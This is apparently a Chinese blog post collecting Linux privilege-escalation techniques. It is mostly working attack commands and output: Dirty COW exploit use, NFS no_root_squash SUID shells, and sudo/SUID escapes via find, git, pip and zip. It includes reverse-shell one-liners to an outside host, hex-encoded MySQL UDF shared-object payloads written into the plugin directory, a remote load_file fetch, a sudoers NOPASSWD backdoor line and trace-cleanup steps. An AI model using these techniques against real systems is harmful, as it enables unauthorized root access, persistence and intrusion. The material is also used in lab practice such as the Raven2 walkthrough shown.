Liunx提权总结

Liunx提权总结

Liunx内核提权

Cve-2016-5195

脏牛漏洞,又叫Dirty COW,存在Liunx内核中已经有长达9年的时间,在2007年发布的liunx内核版本中就已经存在此漏洞。Linux kernel团队在2016年10月18日已经对此进行了修复。

该漏洞具体为,Liunx内核的内存子系统在处理写入时复制时产生了竞争条件(race confition)。恶意用户可以利用此漏洞,来获取高权限,对只读内存映射进行访问。竞争条件,指的是任务执行顺序异常,这样可能会导致应用崩溃,或者是令攻击者有机可乘,进一步执行其他代码。利用这一漏洞,攻击者可在其目标系统提升权限,甚至可能获得root权限。

Liunx内核>=2.6.22

触发代码:https://github.com/dirtycow/dirtycow.github.io/blob/master/dirtyc0w.c

代码分析:

main函数将用户输入的只读文件mmap映射,flag参数是map_private其只读。map_private属性会对此内存写入时,创建一个cow的副本,然后创建2个线程madviseThreadprocselfmenThread,其中procselfmenThread通过/proc/self/mem文件尝试向被映射的内存不断写入数据,madviseThread则不断调用取消映射,两个线程不断操作。竞争条件触发只读文件写入权限,流畅在内核代码中。

触发方式:

1
2
3
4
5
6
7
8
9
10
11
12
13
#echo this is not a test > foo
#chmod 0404 foo
$ ls -lah foo
-r-----r-- 1 root root 19 Oct 20 15:23 foo
$ cat foo
this is not a test
$ gcc -pthread dirtyc0w.c -o dirtyc0w
$ ./dirtyc0w foo m00000000000000000
mmap 56123000
madvise 0
procselfmem 1800000000
$ cat foo
m00000000000000000

exp1:https://github.com/FireFart/dirtycow

exp2:https://github.com/gbonacini/CVE-2016-5195

将exp1上传到目标机器,使用gcc-pthread dirty.c -o dirty -lcrypt命令对dirty.c进行编译,生成一个dirty的可执行文件。

将exp2上传到目标机器,解压,进入解压目录。

执行make后生成可执行文件dcow,执行./dcow -s如果成功的话,就可以返回一个root权限的shell

测试环境:

这里直接使用网上靶场复现:

image-20220224093022033

如果可以写入写入foo文件,表示该机器存在脏牛提权漏洞。

在目标机器上上传liunx-exloit-suggester.sh帮助检测该liunx机器有哪些内核提权漏洞。

利用kali进行内核提权

查看系统发行版本

1
2
cat /etc/issue
cat /etc/*-release

查看内核版本信息

1
uname -a

搜索该版本漏洞

1
searchsploit xxxx XXXXX

image-20220224093957604

把对应版本的文件上传到服务器编译执行

1
gcc -pthread 40839.c -o 40839 -lcrypt

运行然后输入密码,再通过命令切换用户即可

1
su root

第三方服务提权

netstat-antup 查看各种网络服务

NFS提权

什么是NFS?

网络文件系统(NFS)是一个客户端/服务器应用程序,它使计算机用户可以查看和选择存储和更新远程计算机上的文件,就像它们位于用户自己的计算机上一样。在NFS协议是几个分布式文件系统标准,网络附加存储(NAS)之一。

NFS是基于UDP/IP协议的应用,其实现主要是采用远程调用RPC机制,RPC提供了一组与机器、操作系统以及低层传送协议无关的存取远程文件的操作。RPC采用了XDR的支持。XDR是一种与机器无关的数据描述编码的协议,他以独立与任意机器体系结构的格式对网上传送的数据进行编码和解码,支持在异构系统之间数据的传送。

什么是root_sqaush和no_root_saush

Root Squashing(root_sqaush)参数阻止对连接到NFS卷的远程root用户具有root访问权限。远程根用户在连接时会分配一个用户”nfsnobody”,它具有最少的本地特权.如果no_root_squash选项开启的话,并为远程用户授予root用户对所连接系统的访问权限。在配置NFS驱动器时,系统管理员应始终使用”root_squash”权限。

注意:要利用此,no_root_squash选项得开启。

利用NFS并获取Root Shell

现在,我们拿到了一个低权限的shell,我们查看”/etc/exports”文件。

/etc/exports文件包含哪些文件夹/文件系统导出到远程用户的配置和权限。

这个文件的内容非常简单,每一行由抛出路径,客户名列表以及每个客户名后紧跟的访问选项构成:

[共享的目录][主机名或ip(参数,参数)]

1
2
3
4
5
其中参数是可选的,当不指定参数时,nfs将使用默认选项。默认的共享选项是
sync,ro,root_squash,no_delay
当主机名或ip地址为空时,则代表共享给任意客户机提供服务。
当将同一目录共享给多个客户机,但对每个客户机提供的权限不同时,可以这样:
[共享的目录][主机名1或ip1(参数1,参数2)][主机名2或ip2(参数3,参数4)]

当服务器中存在nfs共享,且开启了no_root_squash选项时,这时如果客户端使用的是root权限,那么对于共享目录来说,该客户端就有root权限,可以使用它来提升权限。

查看nfs服务器上的共享目录

1
sudo showmount -e x.x.x.x(nfs主机ip)

创建本地挂载目录,挂载共享目录。使用攻击者本地root权限创建Suid shell。

1
2
3
4
sudo mkdir -p /tmp
sudo mount -t nof x.x.x.x:/home/test /tmp
cp /bin/bash /tmp/shell
chmod u+s /tmp/shell

回到要提权的服务器上,使用普通用户使用shell-p来获取root权限。

git提权

1
2
sudo git -p help
!/bin/bash

或者

1
2
sudo git help config
!/bin//bash

find提权

如果将SUID权限分配给find命令,以便其他用户可以在系统中搜索特定的文件相关文件。尽管管理员可能不知道find命令包含用于执行命令的参数,但攻击者可以以root特权执行命令。

拿到普通用户权限之后,使用sudo -l查看下,查看当前用户是否存在当前用户可以调用sudo的命令。

1
2
3
touch getshell
find / -type f -name getshell -exec "whoami" \;
find / -type f -name getshell -exec "/bin/sh" \;
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
find / -user root -perm 4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {};
如果有find执行
touch test
find . -exec /bin/sh -p \; -quit
这时候,就拥有了root权限的一个shell

find / -perm -u=s -type f 2>/dev/null
-perm 表示搜索随后的权限
-u=s 表示查找root用户拥有的文件
-type 表示我们正在寻找的文件类型
f 表示常规文件,而不是目录或特殊文件
2 表示该进程的第二个文件描述符,即stderr
>表示重定向
/dev/null是一个特殊的文件系统对象,它将丢弃写入其中的所有内容

nc反向反弹

1
2
find /var/www/dirty -exec nc x.x.x.x 8888 -t -e /bin/sh \;
find /var/www/dirty -exec bash -i > & /dev/tcp/127.0.0.1/443 0 >&1 \;

pip提权

1
2
3
4
TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" >
$TF/setup.py
sudo pip install $TF

zip提权

1
2
3
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'

数据库提权

在⾏动之前,我们需要搞清楚,⽬标主机上是否存在MySQL、MySQL运⾏在默认的端⼝还是指定的端⼝、MySQL 的版本信息、MySQL⽤户信息等等。Mysql默认端⼝是3306端⼝,但也有⾃定义端⼝,针对默认端⼝扫描主要利⽤ 扫描软件进⾏探测。我们可以⽤nmap等端⼝扫描⼯具对MySQL的端⼝进⾏扫描。如果已经获得了⽬标MySQL的密 码,我们可以使⽤该⽤户名和密码扫描获取指定IP地址的端⼝信息以及mysql数据库相关信息:

1
2
nmap -sV -sC 192.168.1.13
nmap -sV -sC 192.168.1.13 -p 3306

Nmap还内置了多个mysql相关脚本,有审计、暴力破解、hash、空密码扫描、枚举、基本信息、查询、变量等:

1
2
3
4
5
6
7
8
9
10
11
/usr/share/nmap/scripts/mysql-audit.nse
/usr/share/nmap/scripts/mysql-brute.nse
/usr/share/nmap/scripts/mysql-databases.nse
/usr/share/nmap/scripts/mysql-dump-hashes.nse
/usr/share/nmap/scripts/mysql-empty-password.nse
/usr/share/nmap/scripts/mysql-enum.nse
/usr/share/nmap/scripts/mysql-info.nse
/usr/share/nmap/scripts/mysql-query.nse
/usr/share/nmap/scripts/mysql-users.nse
/usr/share/nmap/scripts/mysql-variables.nse
/usr/share/nmap/scripts/mysql-vuln-cve2012-2122.nse

Metasploit也有几个可用于收集mysql信息的模块:

1
2
3
4
5
6
获取mysql相关信息:
auxiliary/admin/mysql/mysql_enum 
auxiliary/scanner/mysql/mysql_version
文件枚举和目录可写信息枚举:
auxiliary/scanner/mysql/mysql_file_enum
auxiliary/scanner/mysql/mysql_writable_dirs

我们还可以通过使用sqlmap来通过注入点扫描获取目标数据库的信息。sqlmap在测试注入点的时候,会枚举出目标主机的数据库类型,版本等信息。

mysql udf提权执行系统命令

UDF是MySQL的一个拓展接口,UDF(Userdefined function)可翻译为用户自定义函数,这个是用来拓展mysql的技术手段。

使⽤过MySQL的⼈都知道,MySQL有很多内置函数提供给使⽤者,包括字符串函数、数值函数、⽇期和时间函数 等,给开发⼈员和使⽤者带来了很多⽅便。MySQL的内置函数虽然丰富,但毕竟不能满⾜所有⼈的需要,当 MySQL的内置函数不能满⾜需要的时候,就需要对MySQL进⾏⼀些扩展,幸运的是,MySQL给使⽤者提供了添加 新函数的机制,这种使⽤者⾃⾏添加的MySQL函数就称为UDF(User Define Function)。

当我们有了数据库读取和写⼊权限以后,我们就可以尝试使⽤UDF提权的⽅法,从数据库root权限提升到系统的管理员权限。

提权原理

UDF得使用需要调用其动态链接库文件(.dll或.so),使用udf提权原理大概是通过引入恶意的udf.dll,引入自定义函数(如sys_eval()函数),执行系统命令。

利用条件:

  1. 掌握mysql数据库的账户,拥有对mysql的insert和delete权限,以此创建和抛弃函数
  2. 当前用户拥有可以将udf.dll写入相应目录的权限
  3. 如果mysql版本小于5.1且为windows系统,则udf.dll文件存放在C:\windows或者C:\windows\system32目录下。
  4. 如果mysql版本大于5.1. udf.dll文件必须放置在mysql安装目录的lib/plugin文件夹下,该plugin目录默认不存在,需要创建。

假设我的udf文件名为udf.dll,存放在mysql安装目录的lib/plugin目录下(mysql>5.1):

image-20220224115822604

在udf.dll文件中,我定义了一个名为sys_eval()的mysql函数,该函数可以执行系统任意命令。但是如果我现在就打开mysql命令行,使用select sys_eval(‘whoami’);的话,系统会返回sys_eval()函数未定义。因为我们仅仅是把udf.dll放到了lib/plugin目录下,并没有引入。类似于面向对象编程时引入包一样,如果没有引入包,那么这个包的类你是用不了的。所以,我们应该把udf.dll中的自定义函数引入进来。引入的方法如下:

1
create function sys_eval returns string soname 'udf.dll';

sys_eval:我们要引入的函数名。

udf.dll:我们要从中引入函数的链接库文件

成功引入函数后,可以查看一下mysql函数里面新增了sys_eval:

1
select * from mysql.func;

当我们通过各种方法获取了目标mysql数据库的权限并且满足udf提权的条件后,我们可以按照以下步骤进行提权。

1.查看secure_file_priv的值

secure_file_priv是用来限制into dumpfile,into outfile.load_file()能在哪个目录下导出或者读取文件的,所以该值为空是我们利用udf提权的首要条件。

1
2
3
4
5
6
7
mysql> show variables like '%secure_file_priv%';
+------------------+-------+
| Variable_name | Value |
+------------------+-------+
| secure_file_priv | |
+------------------+-------+
1 row in set (0.02 sec)

2. 查看系统架构及plugin插件目录

UDF的dll动态链接库文件需要放在该目录下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
mysql> show variables like '%compile%'; # 查看主机版本及架构
+-------------------------+--------+
| Variable_name | Value |
+-------------------------+--------+
| version_compile_machine | x86_64 |
| version_compile_os | Linux |
+-------------------------+--------+
2 rows in set (0.00 sec)

mysql> show variables like '%plugin%'; # 查看plugin⽬录
+---------------+-------------------------------+
| Variable_name | Value |
+---------------+-------------------------------+
| plugin_dir | /www/server/mysql/lib/plugin/ |
+---------------+-------------------------------+
1 row in set (0.01 sec)

可知该主机plugin插件目录为/www/server/mysql/lib/plugin/

如果该目录不存在的话可以手工创建该文件夹。

3. 将我们构造的恶意动态链接库文件写入plugin插件目录

我们应该去哪儿找恶意的动态链接库文件呢?Sqlmap和Metasploit工具里面都自带了对应系统的动态链接库文件。

下面是两者的UDF动态链接库文件的存放位置

1
2
sqlmap: 位于sqlmap/data/udf/mysql目录下,包含64位和32位liunx和windows系统下利用的动态链接库文件
metasploit: 位于/user/share/metasploit-framework/data/exploits/mysql目录下,包含64位和32位liunx和windows系统下利用的动态链接库文件:

ps:sqlmap中自带的动态链接库为了防止被杀软误杀都要经过编码处理,不能直接使用。使用之前需要先用sqlmap自带的解码工具cloak.py(extra/cloak目录下)解码

1
python3 cloak.py -d -i <动态链接库文件名>

找到目标主机对应系统版本和位数的UDF文件后,我们需要将UDF文件写入plugin插件目录,大多数情况下我们是将.dll转化成16进制然后再写入

首先再攻击者本地,将lib_mysqludf_sys_64.so或lib_mysqludf_sys_32.so中的内容进行十六进制编码:

1
select hex(load_file('lib_mysqludf_sys_64.so')) into outfile "udf_64.hex"

生成了hex文件以后我们可以将udf_53.hex文件的内容复制出来,注意前面加上(0x),然后执行如下命令写入目标机的lib/plugin插件目录下:

1
2
3
4
5
6
7
8
9
select
0x7F454C4602010100000000000000000003003E0001000000D00C0000000000004000000000000000E8180
000000000000000000040003800050040001A00190001000000050000000000000000000000000000000000
00000000000000000000141500000000000014150000000000000000200000000000010000000600000018.
.....010000000000000000000000000000000000000088170000000000009B000000000000000000000000
000000010000000000000000000000000000000100000003000000000000000000000000000000000000002
318000000000000C500000000000000000000000000000001000000000000000000000000000000 into
dumpfile "/www/server/mysql/lib/plugin/udf.so";

但是由于数据过长,我们需要将其分段写入。即先创建一个表,然后将十六进制数据分段写入表中,最后将含有数据的那个字段导出到udf.so,操作如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
create table temp(data longblob);
insert into temp(data) values
(0x7F454C4602010100000000000000000003003E0001000000D00C0000000000004000000000000000E818
0000000000000000000040003800050040001A0019000100000005000000000000000000000000000000000
000000000000000000000141500000000000014150000000000000000200000000000010000000600000018
150000000000001815200000000000181520000000000070020000000000008002000000000000000020000
000000002000000060000004015000000000000401520000000000040152000000000009001000000000000
9001000000000000080000000000000050E5746404000000641200000000000064120000000000006412000
0000000009C000000000000009C00000000000000040000000000000051E574640600000000000000000000
000000000000000000000000000000000000000000000000000000000000000000080000000000000025000
0002B0000001500000005000000280000001E000000000000000000000006000000000000000C0000000000
0000070000002A00000009000000210000000000000000000000270000000B000000220);
update temp set data =
concat(data,0x0000018000000240000000E00000000000000040000001D00000016000000000000001300
00000000000000000000120000002300000010000000250000001A0000000F0000000000000000000000000
00000000000001B000000000000000300000000000000000000000000000000000000000000000000000029
00000014000000000000001900000020000000000000000A000000110000000000000000000000000000000
00000000D000000260000001700000000000000080000000000000000000000000000000000000000000000
1F0000001C00000000000000000000000000000000000000000000000200000000000000110000001400000
00200000007000000800803499119C4C93DA4400398046883140000001600000017000000190000001B0000
001D0000002000000022000000000000002300000000000000240000002500000027000000290000002A000
00000000000CE2CC0BA673C7690EBD3EF0E78722788B98DF10ED871581CC1E2F7DEA868BE12BBE3927C7E8B
92CD1E7066A9C3F9BFBA745BB073371974EC4345D5ECC5A62C1CC3138AFF36AC68AE3B9FD4A0);
update temp set data =
concat(data,0xAC73D1C525681B320B5911FEAB5FBE1200000000000000000000000000000000000000000
00000000000000003000900A00B000000000000000000000000000001000000200000000000000000000000
0000000000000000250000002000000000000000000000000000000000000000E0000000120000000000000
000000000DE01000000000000790100001200000000000000000000007700000000000000BA000000120000
0000000000000000003504000000000000F5000000120000000000000000000000C2010000000000009E010
000120000000000000000000000D900000000000000FB000000120000000000000000000000050000000000
000016000000220000000000000000000000FE00000000000000CF000000120000000000000000000000AD0
0000000000000880100001200000000000000000000008000000000000000AB010000120000000000000000
000000250100000000000010010000120000000000000000000000DC00000000000000C7000000120000000
000000000000000C200000000000000B5000000120000000000000000000000CC02000000000000ED000000
120000000000000000000000E802000000000000E70000001200000000000000000000009B);
...... # 不断通过update语句配合concat将数据拼接进去,当⼗六进制数据全部分段拼⼊data字段后,执⾏如下
命令将该字段导出:
select data from temp into dumpfile "/www/server/mysql/lib/plugin/udf.so";

还有一个方法便是利用load_file()函数,该函数支持远程加载,我们可以将udf文件放在公用服务器上,执行如下命令让目标服务器远程加载该文件并下载到指定目录里:

1
2
select load_file('\\\\xxx.xxx.xxx.xxx\udf.so') into dumpfile
"/www/server/mysql/lib/plugin/udf.so"

引入的方式如下:

1
create function sys_eval returns string soname 'udf.so';

成功引入该函数后,我们便可以像执行其他mysql内置函数一样去使用该函数了。

1
select sys_eval('whoami');

清理痕迹

删除自定义函数

1
drop function sys_eval;

liunx udf提权

这里使用了网上的靶机Raven2。

在经过前面的步骤后,可以找到数据库的密码,可以使用数据库提权。

可以找到mysql数据库的用户名和密码

image-20220226173258537

使用命令

1
uname -a

查找系统版本,确认是64位系统Liunx

image-20220226174052385

/user/share/metasploit-framework/data/exploits/mysql目录下考取出对应的lib_mysqludf_sys_64.so之后通过

1
python -m http.server

命令启动一个http服务,使用wget将该文件下至靶机上并改名sdfz_udf.so文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
mysql> use mysql;
use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
find / -exec "/bin/sh" \;
获取root权限
Database changed
mysql> create table foo(line blob);
create table foo(line blob);
Query OK, 0 rows affected (0.06 sec)
mysql> insert into foo values(load_file('/tmp/sdfz_udf.so'));
insert into foo values(load_file('/tmp/sdfz_udf.so'));
Query OK, 1 row affected (0.00 sec)
mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/sdfz_udf.so';
【其中dumpfile的路径要根据前⾯进程列出来的plugin⽬录进⾏改动】
select * from foo into dumpfile '/usr/lib/mysql/plugin/sdfz_udf.so';
Query OK, 1 row affected (0.04 sec)
mysql> create function do_system returns integer soname 'sdfz_udf.so';
create function do_system returns integer soname 'sdfz_udf.so';
Query OK, 0 rows affected (0.00 sec)
mysql> select * from mysql.func;
select * from mysql.func;
+-----------+-----+-------------+----------+
| name | ret | dl | type |
+-----------+-----+-------------+----------+
| do_system | 2 | sdfz_udf.so | function |
+-----------+-----+-------------+----------+
1 row in set (0.00 sec)
mysql> select do_system('chmod u+s /usr/bin/find');
【chmod u+s 表示给某个程序的所有者以suid权限,可以像root⽤户⼀样操作】
select do_system('chmod u+s /usr/bin/find');
+--------------------------------------+
| do_system('chmod u+s /usr/bin/find') |
+--------------------------------------+
| 0 |
+--------------------------------------+
1 row in set (0.00 sec)
mysql> exit
exit

接下来可以使用find-exec 参数执行命令,获得权限root

image-20220226183137728

Suid提权

运行某些程序暂时获得root权限,例如ping命令

搜索符合条件的可以用来提权的:

1
2
3
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb{} \;
find / -user root -perm -4000 -print 2 >/dev/null

搜索可以提权的程序,一般有以下:

1
nmap vim find bash more less nano cp

计划任务提权

如果可以找到有权限修改的计划任务脚本,就可以修改脚本实现提权。本质上,就是文件权限配置不当。查看计划任务,找到有修改权限的计划任务脚本。

1
2
ls -l /etc/corn*
more /etc/conrntab

可见以下资料:https://www.cnblogs.com/sfsec/p/15163907.html

Sudo提权

普通用户一般是无法运行root所有者的命令的,但是运用sudo可以使普通用户使用root用户的命令。但是在一些场景下,管理员为了平常运营方便给sudoer文件配置不当,从而导致权限提升的问题产生。

首先通过信息收集,查看是否存在sudo配置不当的可能。如果存在,寻找低权限sudo用户的密码,进而提权。

  1. 通过查看/etc/passwd文件找到登录用户
  2. 通过id命令查看两个用户所属组
  3. 通过查看/etc/group文件查看sudo组成员
  4. 通过查看各登录用户家目录隐藏文件,寻找.sudo_as_admin_successful文件,证实sudo成功使用
  5. 在某些时刻sudo被设置为NOPASSWD如下,可以sudo -l

https://gtfobins.github.io/这个网站可以让你在发现sudo提权可以用的时候。给你搭建一个shell。

1
2
$vi /etc/sudoers
在最后一行添加:bypass ALL=(ALL:ALL) NOPASSWD:ALL

PKEXEC提权(CVE-2021-4034)

https://blog.csdn.net/qq_32261191/article/details/122711926

扫一扫,分享到微信

微信分享二维码

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

<br><br>平荒尽处是春山<br>Life is a fucking movie.